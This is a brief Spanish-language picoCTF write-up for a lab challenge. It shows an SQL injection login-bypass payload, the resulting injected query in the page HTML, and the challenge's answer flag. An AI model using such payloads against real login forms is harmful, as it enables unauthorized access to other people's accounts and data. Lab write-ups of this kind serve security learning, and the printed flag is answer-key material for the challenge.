# SQLLite

## Objetivo
Can you login to this website? Try to login [here](http://saturn.picoctf.net:62961/).

## Solucion
Se usa injeccion con el siguiente valor en el usuario y el password:
```
' or 1=1;#
```
Despues en esa pagina solo inspeccionamos el codigo de html:
```html
<pre>username: &#039; or 1=1;#
password: &#039; or 1=1;#
SQL query: SELECT * FROM users WHERE name=&#039;&#039; or 1=1;#&#039; AND password=&#039;&#039; or 1=1;#&#039;
</pre><h1>Logged in! But can you see the flag, it is in plainsight.</h1><p hidden>Your flag is: picoCTF{L00k5_l1k3_y0u_solv3d_it_ec8a64c7}</p>
```

## Referencias


## Notas